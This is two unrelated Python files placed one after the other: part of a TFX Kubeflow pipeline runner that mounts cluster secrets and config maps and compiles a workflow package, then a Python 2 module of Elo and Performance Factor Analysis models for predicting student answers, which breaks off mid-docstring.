from tfx.dsl.components.base import base_component as tfx_base_component
from tfx.orchestration import data_types
from tfx.orchestration import pipeline as tfx_pipeline
from tfx.orchestration import tfx_runner
from tfx.orchestration.config import pipeline_config
from tfx.orchestration.kubeflow import base_component
from tfx.orchestration.kubeflow.proto import kubeflow_pb2
from tfx.orchestration.launcher import base_component_launcher
from tfx.orchestration.launcher import in_process_component_launcher
from tfx.orchestration.launcher import kubernetes_component_launcher
from tfx.proto.orchestration import pipeline_pb2
from tfx.utils import telemetry_utils
# OpFunc represents the type of a function that takes as input a
# dsl.ContainerOp and returns the same object. Common operations such as adding
# k8s secrets, mounting volumes, specifying the use of TPUs and so on can be
# specified as an OpFunc.
# See example usage here:
# https://github.com/kubeflow/pipelines/blob/master/sdk/python/kfp/gcp.py
OpFunc = Callable[[dsl.ContainerOp], dsl.ContainerOp]
# Default secret name for GCP credentials. This secret is installed as part of
# a typical Kubeflow installation when the component is GKE.
_KUBEFLOW_GCP_SECRET_NAME = 'user-gcp-sa'
# Default TFX container image to use in KubeflowDagRunner.
DEFAULT_KUBEFLOW_TFX_IMAGE = 'tensorflow/tfx:%s' % (version.__version__,)
def _mount_config_map_op(config_map_name: Text) -> OpFunc:
"""Mounts all key-value pairs found in the named Kubernetes ConfigMap.
All key-value pairs in the ConfigMap are mounted as environment variables.
Args:
config_map_name: The name of the ConfigMap resource.
Returns:
An OpFunc for mounting the ConfigMap.
"""
def mount_config_map(container_op: dsl.ContainerOp):
config_map_ref = k8s_client.V1ConfigMapEnvSource(
name=config_map_name, optional=True)
container_op.container.add_env_from(
k8s_client.V1EnvFromSource(config_map_ref=config_map_ref))
return mount_config_map
def _mount_secret_op(secret_name: Text) -> OpFunc:
"""Mounts all key-value pairs found in the named Kubernetes Secret.
All key-value pairs in the Secret are mounted as environment variables.
Args:
secret_name: The name of the Secret resource.
Returns:
An OpFunc for mounting the Secret.
"""
def mount_secret(container_op: dsl.ContainerOp):
secret_ref = k8s_client.V1ConfigMapEnvSource(
name=secret_name, optional=True)
container_op.container.add_env_from(
k8s_client.V1EnvFromSource(secret_ref=secret_ref))
return mount_secret
def get_default_pipeline_operator_funcs(
use_gcp_sa: bool = False) -> List[OpFunc]:
"""Returns a default list of pipeline operator functions.
Args:
use_gcp_sa: If true, mount a GCP service account secret to each pod, with
the name _KUBEFLOW_GCP_SECRET_NAME.
Returns:
A list of functions with type OpFunc.
"""
# Enables authentication for GCP services if needed.
gcp_secret_op = gcp.use_gcp_secret(_KUBEFLOW_GCP_SECRET_NAME)
# Mounts configmap containing Metadata gRPC server configuration.
mount_config_map_op = _mount_config_map_op('metadata-grpc-configmap')
if use_gcp_sa:
return [gcp_secret_op, mount_config_map_op]
else:
return [mount_config_map_op]
def get_default_kubeflow_metadata_config(
) -> kubeflow_pb2.KubeflowMetadataConfig:
"""Returns the default metadata connection config for Kubeflow.
Returns:
A config proto that will be serialized as JSON and passed to the running
container so the TFX component driver is able to communicate with MLMD in
a Kubeflow cluster.
"""
# The default metadata configuration for a Kubeflow Pipelines cluster is
# codified as a Kubernetes ConfigMap
# https://github.com/kubeflow/pipelines/blob/master/manifests/kustomize/base/metadata/metadata-grpc-configmap.yaml
config = kubeflow_pb2.KubeflowMetadataConfig()
# The environment variable to use to obtain the Metadata gRPC service host in
# the cluster that is backing Kubeflow Metadata. Note that the key in the
# config map and therefore environment variable used, are lower-cased.
config.grpc_config.grpc_service_host.environment_variable = 'METADATA_GRPC_SERVICE_HOST'
# The environment variable to use to obtain the Metadata grpc service port in
# the cluster that is backing Kubeflow Metadata.
config.grpc_config.grpc_service_port.environment_variable = 'METADATA_GRPC_SERVICE_PORT'
return config
def get_default_pod_labels() -> Dict[Text, Text]:
"""Returns the default pod label dict for Kubeflow."""
# KFP default transformers add pod env:
# https://github.com/kubeflow/pipelines/blob/0.1.32/sdk/python/kfp/compiler/_default_transformers.py
result = {
'add-pod-env': 'true',
telemetry_utils.LABEL_KFP_SDK_ENV: 'tfx'
}
return result
def get_default_output_filename(pipeline_name: str) -> str:
return pipeline_name + '.tar.gz'
class KubeflowDagRunnerConfig(pipeline_config.PipelineConfig):
"""Runtime configuration parameters specific to execution on Kubeflow."""
def __init__(
self,
pipeline_operator_funcs: Optional[List[OpFunc]] = None,
tfx_image: Optional[Text] = None,
kubeflow_metadata_config: Optional[
kubeflow_pb2.KubeflowMetadataConfig] = None,
# TODO(b/143883035): Figure out the best practice to put the
# SUPPORTED_LAUNCHER_CLASSES
supported_launcher_classes: Optional[List[Type[
base_component_launcher.BaseComponentLauncher]]] = None,
**kwargs):
"""Creates a KubeflowDagRunnerConfig object.
The user can use pipeline_operator_funcs to apply modifications to
ContainerOps used in the pipeline. For example, to ensure the pipeline
steps mount a GCP secret, and a Persistent Volume, one can create config
object like so:
from kfp import gcp, onprem
mount_secret_op = gcp.use_secret('my-secret-name)
mount_volume_op = onprem.mount_pvc(
"my-persistent-volume-claim",
"my-volume-name",
"/mnt/volume-mount-path")
config = KubeflowDagRunnerConfig(
pipeline_operator_funcs=[mount_secret_op, mount_volume_op]
)
Args:
pipeline_operator_funcs: A list of ContainerOp modifying functions that
will be applied to every container step in the pipeline.
tfx_image: The TFX container image to use in the pipeline.
kubeflow_metadata_config: Runtime configuration to use to connect to
Kubeflow metadata.
supported_launcher_classes: A list of component launcher classes that are
supported by the current pipeline. List sequence determines the order in
which launchers are chosen for each component being run.
**kwargs: keyword args for PipelineConfig.
"""
supported_launcher_classes = supported_launcher_classes or [
in_process_component_launcher.InProcessComponentLauncher,
kubernetes_component_launcher.KubernetesComponentLauncher,
]
super(KubeflowDagRunnerConfig, self).__init__(
supported_launcher_classes=supported_launcher_classes, **kwargs)
self.pipeline_operator_funcs = (
pipeline_operator_funcs or get_default_pipeline_operator_funcs())
self.tfx_image = tfx_image or DEFAULT_KUBEFLOW_TFX_IMAGE
self.kubeflow_metadata_config = (
kubeflow_metadata_config or get_default_kubeflow_metadata_config())
class KubeflowDagRunner(tfx_runner.TfxRunner):
"""Kubeflow Pipelines runner.
Constructs a pipeline definition YAML file based on the TFX logical pipeline.
"""
def __init__(
self,
output_dir: Optional[Text] = None,
output_filename: Optional[Text] = None,
config: Optional[KubeflowDagRunnerConfig] = None,
pod_labels_to_attach: Optional[Dict[Text, Text]] = None
):
"""Initializes KubeflowDagRunner for compiling a Kubeflow Pipeline.
Args:
output_dir: An optional output directory into which to output the pipeline
definition files. Defaults to the current working directory.
output_filename: An optional output file name for the pipeline definition
file. Defaults to pipeline_name.tar.gz when compiling a TFX pipeline.
Currently supports .tar.gz, .tgz, .zip, .yaml, .yml formats. See
https://github.com/kubeflow/pipelines/blob/181de66cf9fa87bcd0fe9291926790c400140783/sdk/python/kfp/compiler/compiler.py#L851
for format restriction.
config: An optional KubeflowDagRunnerConfig object to specify runtime
configuration when running the pipeline under Kubeflow.
pod_labels_to_attach: Optional set of pod labels to attach to GKE pod
spinned up for this pipeline. Default to the 3 labels:
1. add-pod-env: true,
2. pipeline SDK type,
3. pipeline unique ID,
where 2 and 3 are instrumentation of usage tracking.
"""
if config and not isinstance(config, KubeflowDagRunnerConfig):
raise TypeError('config must be type of KubeflowDagRunnerConfig.')
super(KubeflowDagRunner, self).__init__(config or KubeflowDagRunnerConfig())
self._config = cast(KubeflowDagRunnerConfig, self._config)
self._output_dir = output_dir or os.getcwd()
self._output_filename = output_filename
self._compiler = compiler.Compiler()
self._tfx_compiler = tfx_compiler.Compiler()
self._params = [] # List of dsl.PipelineParam used in this pipeline.
self._deduped_parameter_names = set() # Set of unique param names used.
if pod_labels_to_attach is None:
self._pod_labels_to_attach = get_default_pod_labels()
else:
self._pod_labels_to_attach = pod_labels_to_attach
def _parse_parameter_from_component(
self, component: tfx_base_component.BaseComponent) -> None:
"""Extract embedded RuntimeParameter placeholders from a component.
Extract embedded RuntimeParameter placeholders from a component, then append
the corresponding dsl.PipelineParam to KubeflowDagRunner.
Args:
component: a TFX component.
"""
for parameter in component.exec_properties.values():
if not isinstance(parameter, data_types.RuntimeParameter):
continue
# Ignore pipeline root because it will be added later.
if parameter.name == tfx_pipeline.ROOT_PARAMETER.name:
continue
if parameter.name not in self._deduped_parameter_names:
self._deduped_parameter_names.add(parameter.name)
# TODO(b/178436919): Create a test to cover default value rendering
# and move the external code reference over there.
# The default needs to be serialized then passed to dsl.PipelineParam.
# See
# https://github.com/kubeflow/pipelines/blob/f65391309650fdc967586529e79af178241b4c2c/sdk/python/kfp/dsl/_pipeline_param.py#L154
dsl_parameter = dsl.PipelineParam(
name=parameter.name,
# TODO(b/186566348): remove the quote replacement.
value=str(parameter.default).replace('\\',
'\\\\').replace('"', '\\"'))
self._params.append(dsl_parameter)
def _parse_parameter_from_pipeline(self,
pipeline: tfx_pipeline.Pipeline) -> None:
"""Extract all the RuntimeParameter placeholders from the pipeline."""
for component in pipeline.components:
self._parse_parameter_from_component(component)
def _construct_pipeline_graph(self, pipeline: tfx_pipeline.Pipeline,
pipeline_root: dsl.PipelineParam):
"""Constructs a Kubeflow Pipeline graph.
Args:
pipeline: The logical TFX pipeline to base the construction on.
pipeline_root: dsl.PipelineParam representing the pipeline root.
"""
component_to_kfp_op = {}
tfx_ir = self._generate_tfx_ir(pipeline)
# Assumption: There is a partial ordering of components in the list, i.e.,
# if component A depends on component B and C, then A appears after B and C
# in the list.
for component in pipeline.components:
# Keep track of the set of upstream dsl.ContainerOps for this component.
depends_on = set()
for upstream_component in component.upstream_nodes:
depends_on.add(component_to_kfp_op[upstream_component])
kfp_component = base_component.BaseComponent(
component=component,
depends_on=depends_on,
pipeline=pipeline,
pipeline_root=pipeline_root,
tfx_image=self._config.tfx_image,
kubeflow_metadata_config=self._config.kubeflow_metadata_config,
pod_labels_to_attach=self._pod_labels_to_attach,
tfx_ir=tfx_ir)
for operator in self._config.pipeline_operator_funcs:
kfp_component.container_op.apply(operator)
component_to_kfp_op[component] = kfp_component.container_op
def _generate_tfx_ir(
self, pipeline: tfx_pipeline.Pipeline) -> Optional[pipeline_pb2.Pipeline]:
result = self._tfx_compiler.compile(pipeline)
logging.info('Generated pipeline:\n %s', result)
return result
def run(self, pipeline: tfx_pipeline.Pipeline):
"""Compiles and outputs a Kubeflow Pipeline YAML definition file.
Args:
pipeline: The logical TFX pipeline to use when building the Kubeflow
pipeline.
"""
for component in pipeline.components:
# TODO(b/187122662): Pass through pip dependencies as a first-class
# component flag.
if isinstance(component, tfx_base_component.BaseComponent):
component._resolve_pip_dependencies( # pylint: disable=protected-access
pipeline.pipeline_info.pipeline_root)
# KFP DSL representation of pipeline root parameter.
dsl_pipeline_root = dsl.PipelineParam(
name=tfx_pipeline.ROOT_PARAMETER.name,
value=pipeline.pipeline_info.pipeline_root)
self._params.append(dsl_pipeline_root)
def _construct_pipeline():
"""Constructs a Kubeflow pipeline.
Creates Kubeflow ContainerOps for each TFX component encountered in the
logical pipeline definition.
"""
self._construct_pipeline_graph(pipeline, dsl_pipeline_root)
# Need to run this first to get self._params populated. Then KFP compiler
# can correctly match default value with PipelineParam.
self._parse_parameter_from_pipeline(pipeline)
file_name = self._output_filename or get_default_output_filename(
pipeline.pipeline_info.pipeline_name)
# Create workflow spec and write out to package.
self._compiler._create_and_write_workflow( # pylint: disable=protected-access
pipeline_func=_construct_pipeline,
pipeline_name=pipeline.pipeline_info.pipeline_name,
params_list=self._params,
package_path=os.path.join(self._output_dir, file_name))
|
# -*- coding: utf-8 -*-
"""
Evaluation Models
=================
"""
from __future__ import division
from copy import copy
from itertools import izip
from collections import defaultdict
import numpy as np
import pandas as pd
import tools
__all__ = (
'DummyPriorModel',
'EloModel',
'EloResponseTime',
'PFAModel',
'PFAResponseTime',
'PFAExt',
'PFAExtTiming',
'PFAExtStaircase',
'PFAExtSpacing',
'PFAGong',
'PFAGongTiming',
'PFATiming',
)
#: Dictionary of the most commonly used time effect functions in this thesis.
time_effect_funcs = {}
def register_time_effect(name):
"""Registers new time effect functions."""
def register(time_effect):
time_effect_funcs[name] = time_effect
return register
@register_time_effect('log')
def time_effect_log(t, a=1.8, c=0.123):
return a - c * np.log(t)
@register_time_effect('pow')
def time_effect_div(t, a=2, c=0.2):
return a / (t+1) ** c
@register_time_effect('exp')
def time_effect_exp(t, a=1.6, c=0.01):
return a * np.exp(-c * np.sqrt(t))
def init_time_effect(obj, name, parameters=('a', 'c')):
"""Prepares time effect function based on name. Initializes
the given object with default parameters `a` and `c`.
:param obj: Object to initialize with time effect function.
:param name: Name of the time effect function.
"""
time_effect_fun = time_effect_funcs[name]
defaults = time_effect_fun.func_defaults
a, c = parameters
if getattr(obj, a, None) is None:
setattr(obj, a, defaults[0])
if getattr(obj, c, None) is None:
setattr(obj, c, defaults[1])
def time_effect(t):
a_val, c_val = getattr(obj, a), getattr(obj, c)
return time_effect_fun(t, a_val, c_val)
return time_effect
class Question(object):
"""Representation of a question."""
def __init__(self, **kwargs):
self.id = kwargs.pop('id')
self.user_id = kwargs.pop('user_id')
self.place_id = kwargs.pop('place_id')
self.type = kwargs.pop('type')
self.inserted = kwargs.pop('inserted')
self.options = kwargs.pop('options')
class Answer(Question):
"""Answer to a question."""
def __init__(self, **kwargs):
super(Answer, self).__init__(**kwargs)
self.place_answered = kwargs.pop('place_answered')
self.response_time = kwargs.pop('response_time')
self.is_correct = kwargs.pop('is_correct')
class User(object):
"""Returns a user with given ID.
:param user_id: ID of the user.
:type user_id: int
"""
def __init__(self, user_id):
self.id = user_id
self.skill_increments = []
@property
def skill(self):
"""Skill of the user."""
return sum(self.skill_increments)
@property
def answers_count(self):
"""Number of answer of the user (equal to the number of
skill increments.
"""
return len(self.skill_increments)
def inc_skill(self, increment):
"""Increments the skill of the user.
:param increment: Increment (or decrement) of the skill.
:type increment: int
"""
self.skill_increments += [increment]
class Place(object):
"""Returns a place with given ID.
:param place_id: ID of the place.
:type place_id: int
"""
def __init__(self, place_id):
self.id = place_id
self.difficulty_increments = []
@property
def difficulty(self):
"""Difficulty of the place."""
return sum(self.difficulty_increments)
@property
def answers_count(self):
"""Number of answer for the place (equal to the number of
difficulty increments.
"""
return len(self.difficulty_increments)
def inc_difficulty(self, increment):
"""Increments the difficulty of the place.
:param increment: Increment (or decrement) of the difficulty.
:type increment: int
"""
self.difficulty_increments += [increment]
class Item(object):
"""Item representation.
:param prior: Prior skills of users and difficulties of places.
:type prior: dictionary
:param user_id: ID of the user.
:type user_id: int
:param place_id: ID of the place.
:type place_id: int
"""
def __init__(self, prior, user_id, place_id):
self.prior = prior
self.user_id = user_id
self.place_id = place_id
self.practices = []
self.knowledge_increments = []
@property
def user(self):
"""User answering the item."""
return self.prior.users[self.user_id]
@property
def place(self):
"""Place of the item being asked."""
return self.prior.places[self.place_id]
@property
def knowledge(self):
"""Knowledge of the item by the user."""
return (
(self.user.skill - self.place.difficulty)
+ sum(self.knowledge_increments)
)
@property
def correct(self):
"""List of correct answers."""
return [ans for ans in self.practices if ans.is_correct]
@property
def incorrect(self):
"""List of incorrect answers."""
return [ans for ans in self.practices if not ans.is_correct]
@property
def last_inserted(self):
"""Returns the time of the last answer for this item
or :obj:`None` if the item was never answered before.
"""
if self.practices:
return self.practices[-1].inserted
@property
def any_incorrect(self):
""":obj:`True` if at least one of the practiced item
was answered incorrectly, otherwise :obj:`False`.
"""
return any(not answer.is_correct for answer in self.practices)
def get_diffs(self, current):
"""Returns list of previous practices expresed as the number
of seconds that passed between *current* practice and all
the *previous* practices.
:param current: Datetime of the current practice.
:type place: string
"""
return [
tools.time_diff(current, prior.inserted)
for prior in self.practices
]
def inc_knowledge(self, increment):
"""Increments the knowledge of the user of the item.
:param increment: Increment (or decrement) of the knowledge.
:type increment: int
"""
self.knowledge_increments += [increment]
def add_practice(self, answer):
"""Registers new practice of the item.
:param answer: Information about the answer.
:type answer: :class:`pandas.Series` or :class:`Answer`
"""
if isinstance(answer, pd.Series):
self.practices += [Answer(**answer.to_dict())]
else:
self.practices += [copy(answer)]
class Model(object):
"""Abstract model class."""
ABBR = None
def respect_guess(self, prediction, options):
"""Updates prediction with respect to guessing paramter.
:param prediction: Prediction calculated so far.
:type prediction: float
:param options: Number of options in the multiple-choice question.
:type options: int
"""
if options:
val = 1 / len(options)
return val + (1 - val) * prediction
else:
return prediction
def predict(self, question):
"""Returns probability of correct answer for given question.
:param question: Asked question.
:type question: :class:`pandas.Series` or :class:`Question`
"""
raise NotImplementedError()
def update(self, answer):
"""Performes an update of skills, difficulties or knowledge.
:param answer: Asked question.
:type answer: :class:`pandas.Series` or :class:`Answer`
"""
raise NotImplementedError()
def train(self, data):
"""Trains the model on given data set.
:param data: Data set on which to train the model.
:type data: :class:`pandas.DataFrame`
"""
raise NotImplementedError()
@classmethod
def split_data(cls, data, ratio=0.7):
"""Classmethod that splits data into training set and test set.
:param data: The object containing data.
:type data: :class:`pandas.DataFrame`.
:param ratio: What portion of data to include in the training set
and the test set. :obj:`0.5` means that the data will be
distributed equaly.
:type ratio: float
"""
raise NotImplementedError()
class DummyPriorModel(Model):
"""Dummy model that sets all skills of users and difficulties
of places to zero.
"""
class _User(object):
"""Returns a user with given ID."""
def __init__(self, skill):
self.skill = skill
class _Place(object):
"""Returns a place with given ID."""
def __init__(self, difficulty):
self.difficulty = difficulty
def __init__(self, skill=0.0, difficulty=0.0):
self.users = defaultdict(lambda: self._User(skill))
self.places = defaultdict(lambda: self._Place(difficulty))
def update(self, answer):
pass
def train(self, data):
pass
class EloModel(Model):
"""Predicts correctness of answers using Elo Rating System.
The model is parametrized with `alpha` and `beta`. These parameters
affect the uncertainty function.
"""
ABBR = 'Elo'
def __init__(self, alpha=1, beta=0.05):
self.alpha = alpha
self.beta = beta
self.init_model()
def init_model(self):
"""Initializes two attributes of the model. Both attributes are
dataframes. The first attribute represents difficulties of countries.
The second attribute represents global knowledge of students.
"""
self.places = tools.keydefaultdict(Place)
self.users = tools.keydefaultdict(User)
self.predictions = {}
def uncertainty(self, n):
"""Uncertainty function. The purpose is to make each update on
the model trained with sequence of `n` answers less and less
significant as the number of prior answers is bigger.
:param n: Number of user's answers or total answers to a place.
:type n: int
"""
return self.alpha / (1 + self.beta * n)
def predict(self, question):
"""Returns probability of correct answer for given question.
:param question: Asked question.
:type question: :class:`pandas.Series` or :class:`Question`
"""
user = self.users[question.user_id]
place = self.places[question.place_id]
prediction = tools.sigmoid(user.skill - place.difficulty)
return self.respect_guess(prediction, question.options)
def update(self, answer):
"""Updates skills of users and difficulties of places according
to given answer.
:param answer: Answer to a question.
:type answer: :class:`pandas.Series`
"""
user = self.users[answer.user_id]
place = self.places[answer.place_id]
prediction = self.predict(answer)
shift = answer.is_correct - prediction
user.inc_skill(self.uncertainty(user.answers_count) * shift)
place.inc_difficulty(-(self.uncertainty(place.answers_count) * shift))
self.predictions[answer.id] = prediction
def train(self, data):
"""Trains the model on given data set.
:param data: Data set on which to train the model.
:type data: :class:`pandas.DataFrame`
"""
self.init_model()
data = tools.first_answers(data)
data.sort(['inserted']).apply(self.update, axis=1)
@classmethod
def split_data(cls, data, ratio=0.7):
"""Classmethod that splits data into training set and test set.
:param data: The object containing data.
:type data: :class:`pandas.DataFrame`.
:param ratio: What portion of data to include in the training set
and the test set. :obj:`0.5` means that the data will be
distributed equaly.
:type ratio: float
"""
data = tools.first_answers(data)
return tools.split_data(data, ratio=ratio)
class EloResponseTime(EloModel):
"""Extension of the Elo model that takes response time of user
into account.
"""
ABBR = 'Elo/RT'
def __init__(self, *args, **kwargs):
self.zeta = kwargs.pop('zeta', 3)
super(EloResponseTime, self).__init__(*args, **kwargs)
def update(self, answer):
"""Updates skills of users and difficulties of places according
to given answer.
:param answer: Answer to a question.
:type answer: :class:`pandas.Series` or :class:`Answer`
"""
user = self.users[answer.user_id]
place = self.places[answer.place_id]
prediction = self.predict(answer)
level = tools.automaticity_level(answer.response_time)
prob = (prediction * self.zeta + level) / (self.zeta + 1)
shift = answer.is_correct - prob
user.inc_skill(self.uncertainty(user.answers_count) * shift)
place.inc_difficulty(-(self.uncertainty(place.answers_count) * shift))
self.predictions[answer.id] = prediction
class PFAModel(Model):
"""Standard Performance Factor Analysis.
:param gamma: The significance of the update when the student
answered correctly.
:type gamma: float
:param delta: The significance of the update when the student
answered incorrectly.
:type delta: float
"""
ABBR = 'PFA'
def __init__(self, prior=None, gamma=3.4, delta=-0.3):
super(PFAModel, self).__init__()
self.prior = prior or DummyPriorModel()
self.gamma = gamma
self.delta = delta
self.init_model()
def init_model(self):
"""Initializes attribute of the model that stores current
knowledge of places for all students.
"""
self.items = tools.keydefaultdict(
lambda *args: Item(self.prior, *args)
)
self.predictions = {}
def predict(self, question):
"""Returns probability of correct answer for given question.
:param question: Asked question.
:type question: :class:`pandas.Series` or :class:`Question`
"""
item = self.items[question.user_id, question.place_id]
knowledge = (
item.knowledge +
self.gamma * len(item.correct) +
self.delta * len(item.incorrect)
)
return tools.sigmoid(knowledge)
def update(self, answer):
"""Performes update of current knowledge of a user based on the
given answer.
:param answer: Answer to a question.
:type answer: :class:`pandas.Series` or :class:`Answer`
"""
item = self.items[answer.user_id, answer.place_id]
if not item.practices:
self.prior.update(answer)
prediction = self.predict(answer)
self.predictions[answer.id] = prediction
item.add_practice(answer)
def train(self, data):
"""Trains the model on given data set.
:param data: Data set on which to train the model.
:type data: :class:`pandas.DataFrame`
"""
self.init_model()
data.sort(['inserted']).apply(self.update, axis=1)
@classmethod
def split_data(self, data):
"""Classmethod that splits data into training set and test set.
:param data: The object containing data.
:type data: :class:`pandas.DataFrame`.
"""
test_set = tools.last_answers(data)
train_set = data[~data['id'].isin(test_set['id'])]
return train_set, test_set
class PFAExt(PFAModel):
"""PFA model for estimation of current knowledge.
:param gamma: The significance of the update when the student
answered correctly.
:type gamma: float
:param delta: The significance of the update when the student
answered incorrectly.
:type delta: float
"""
ABBR = 'PFA/E'
def predict(self, question):
"""Returns probability of correct answer for given question.
:param question: Asked question.
:type question: :class:`pandas.Series` or :class:`Question`
"""
item = self.items[question.user_id, question.place_id]
prediction = tools.sigmoid(item.knowledge)
return self.respect_guess(prediction, question.options)
def update(self, answer):
"""Performes update of current knowledge of a user based on the
given answer.
:param answer: Answer to a question.
:type answer: :class:`pandas.Series` or :class:`Answer`
"""
item = self.items[answer.user_id, answer.place_id]
if not item.practices:
self.prior.update(answer)
prediction = self.predict(answer)
self.predictions[answer.id] = prediction
item.add_practice(answer)
if answer.is_correct:
item.inc_knowledge(self.gamma * (1 - prediction))
else:
item.inc_knowledge(self.delta * prediction)
class PFAResponseTime(PFAExt):
"""An extended version of the PFAExt model which alters student's
knowledge by respecting past response times.
:param gamma: The significance of the update when the student
answered correctly.
:type gamma: float
:param delta: The significance of the update when the student
answered incorrectly.
:type delta: float
:param zeta: The significance of response times.
:type zeta: float
"""
ABBR = 'PFA/E/RT'
def __init__(self, *args, **kwargs):
kwargs.setdefault('gamma', 1.5)
kwargs.setdefault('delta', -1.4)
self.zeta = kwargs.pop('zeta', 1.9)
super(PFAResponseTime, self).__init__(*args, **kwargs)
def update(self, answer):
"""Performes update of current knowledge of a user based on the
given answer.
:param answer: Answer to a question.
:type answer: :class:`pandas.Series` or :class:`Answer`
"""
item = self.items[answer.user_id, answer.place_id]
if not item.practices:
self.prior.update(answer)
prediction = self.predict(answer)
self.predictions[answer.id] = prediction
item.add_practice(answer)
level = tools.automaticity_level(answer.response_time) / self.zeta
if answer.is_correct:
item.inc_knowledge(self.gamma * (1 - prediction) + level)
else:
item.inc_knowledge(self.delta * prediction + level)
class PFAExtTiming(PFAExt):
"""Alternative version of :class:`PFAExtSpacing` which ignores
spacing effect. Only forgetting is considered.
:param gamma: The significance of the update when the student
answered correctly.
:type gamma: float
:param delta: The significance of the update when the student
answered incorrectly.
:type delta: float
:param time_effect_fun: Time effect function.
:type time_effect_fun: callable or string
"""
ABBR = 'PFA/E/T'
def __init__(self, *args, **kwargs):
kwargs.setdefault('gamma', 2.3)
kwargs.setdefault('delta', -0.9)
time_effect = kwargs.pop('time_effect_fun', 'poly')
if isinstance(time_effect, basestring):
self.a, self.c = kwargs.pop('a', None), kwargs.pop('c', None)
self.time_effect = init_time_effect(self, time_effect)
else:
self.time_effect = time_effect
super(PFAExtTiming, self).__init__(*args, **kwargs)
def predict(self, question):
"""Returns probability of correct answer for given question.
:param question: Asked question.
:type question: :class:`pandas.Series` or :class:`Question`
"""
item = self.items[question.user_id, question.place_id]
if item.practices:
seconds = tools.time_diff(question.inserted, item.last_inserted)
time_effect = self.time_effect(seconds)
else:
time_effect = 0
prediction = tools.sigmoid(item.knowledge + time_effect)
return self.respect_guess(prediction, question.options)
class PFAExtStaircase(PFAExtTiming):
"""Alternative version of :class:`PFAESpacing` which ignores
spacing effect. Only forgetting is considered given by staircase
fucntion.
:param gamma: The significance of the update when the student
answered correctly.
:type gamma: float
:param delta: The significance of the update when the student
answered incorrectly.
:type delta: float
:param time_effect_fun: Values for staircase function.
:type time_effect_fun: dict (tuples as keys)
"""
ABBR = 'PFA/E/T staircase'
def __init__(self, *args, **kwargs):
kwargs.setdefault('gamma', 2.5)
kwargs.setdefault('delta', -0.8)
self.staircase = tools.intervaldict(kwargs.pop('staircase'))
self.time_effect = lambda k: self.staircase[k]
super(PFAExtTiming, self).__init__(*args, **kwargs)
class PFAExtSpacing(PFAExtTiming):
"""Extended version of PFA that takes into account the effect of
forgetting and spacing.
:param gamma: The significance of the update when the student
answers correctly.
:type gamma: float
:param delta: The significance of the update when the student
answers incorrectly.
:type delta: float
:param spacing_rate: The significance of the spacing effect. Lower
values make the effect less significant. If the spacing rate
is set to zero, the model is unaware of the spacing effect.
:type spacing_rate: float
:param decay_rate: The significance of the forgetting effect. Higher
values of decay rate make the students forget the item faster
and vice versa.
:type decay_rate: float
"""
ABBR = 'PFA/E/S'
def __init__(self, *args, **kwargs):
kwargs.setdefault('gamma', 2.8)
kwargs.setdefault('delta', -0.7)
self.spacing_rate = kwargs.pop('spacing_rate', 0)
self.decay_rate = kwargs.pop('decay_rate', 0.18)
self.iota = kwargs.pop('iota', 1.5)
super(PFAExtSpacing, self).__init__(*args, **kwargs)
def memory_strength(self, question):
"""Estimates memory strength of an item.
:param question: Asked question.
:type question: :class:`pandas.Series`
"""
item = self.items[question.user_id, question.place_id]
practices = item.get_diffs(question.inserted)
if len(practices) > 0:
return self.iota + tools.memory_strength(
filter(lambda x: x > 0, practices),
spacing_rate=self.spacing_rate,
decay_rate=self.decay_rate,
)
def predict(self, question):
"""Returns probability of correct answer for given question.
:param question: Asked question.
:type question: :class:`pandas.Series` or :class:`Question`
"""
item = self.items[question.user_id, question.place_id]
if item.any_incorrect:
strength = self.memory_strength(question)
else:
strength = 0
prediction = tools.sigmoid(item.knowledge + strength)
return self.respect_guess(prediction, question.options)
class PFAGong(PFAModel):
"""Yue Gong's extended Performance Factor Analysis.
:param gamma: The significance of the update when the student
answers correctly.
:type gamma: float
:param delta: The significance of the update when the student
answers incorrectly.
:type delta: float
:param decay: Decay rate of answers.
:type decay: float
"""
ABBR = 'PFA/G'
def __init__(self, *args, **kwargs):
kwargs.setdefault('gamma', 2.1)
kwargs.setdefault('delta', -0.8)
self.decay = kwargs.pop('decay', 0.8)
super(PFAGong, self).__init__(*args, **kwargs)
def get_weights(self, item, question):
"""Returns weights of previous answers to the given item.
:param item: *Item* (i.e. practiced place by a user).
:type item: :class:`Item`
:param question: Asked question.
:type question: :class:`pandas.Series` or :class:`Question`
"""
correct_weights = [
ans.is_correct * self.decay ** k for k, ans
in tools.reverse_enumerate(item.practices)
]
incorrect_weights = [
(1 - ans.is_correct) * self.decay ** k for k, ans
in tools.reverse_enumerate(item.practices)
]
return sum(correct_weights), sum(incorrect_weights)
def predict(self, question):
"""Returns probability of correct answer for given question.
:param question: Asked question.
:type question: :class:`pandas.Series` or :class:`Question`
"""
item = self.items[question.user_id, question.place_id]
correct_weight, incorrect_weight = self.get_weights(item, question)
knowledge = (
item.knowledge +
self.gamma * correct_weight +
self.delta * incorrect_weight
)
prediction = tools.sigmoid(knowledge)
return self.respect_guess(prediction, question.options)
def update(self, answer):
"""Performes update of current knowledge of a user based on the
given answer.
:param answer: Answer to a question.
:type answer: :class:`pandas.Series` or :class:`Answer`
"""
item = self.items[answer.user_id, answer.place_id]
if not item.practices:
self.prior.update(answer)
prediction = self.predict(answer)
self.predictions[answer.id] = prediction
item.add_practice(answer)
class PFAGongTiming(PFAGong):
"""Performance Factor Analysis combining some aspects of both
the Yue Gong's PFA and the ACT-R model.
:param gamma: The significance of the update when the student
answers correctly.
:type gamma: float
:param delta: The significance of the update when the student
answers incorrectly.
:type delta: float
:param time_effect_fun: Time effect function.
:type time_effect_fun: callable or string
"""
ABBR = 'PFA/G/T old'
def __init__(self, *args, **kwargs):
kwargs.setdefault('gamma', 1.7)
kwargs.setdefault('delta', 0.5)
time_effect = kwargs.pop('time_effect_fun', 'pow')
if isinstance(time_effect, basestring):
self.a, self.c = kwargs.pop('a', None), kwargs.pop('c', None)
self.time_effect = init_time_effect(self, time_effect)
else:
self.time_effect = time_effect
super(PFAGong, self).__init__(*args, **kwargs)
def get_weights(self, item, question):
"""Returns weights of previous answers to the given item.
:param item: *Item* (i.e. practiced place by a user).
:type item: :class:`Item`
:param question: Asked question.
:type question: :class:`pandas.Series` or :class:`Question`
"""
correct_weights = [
max(ans.is_correct * self.time_effect(diff), 0) for ans, diff
in izip(item.practices, item.get_diffs(question.inserted))
]
incorrect_weights = [
(1 - ans.is_correct) * self.time_effect(diff) for ans, diff
in izip(item.practices, item.get_diffs(question.inserted))
]
return sum(correct_weights), sum(incorrect_weights)
class PFATiming(PFAGong):
"""Performance Factor Analysis combining some aspects of both
the Yue Gong's PFA and the ACT-R model.
:param gamma: The significance of the update when the student
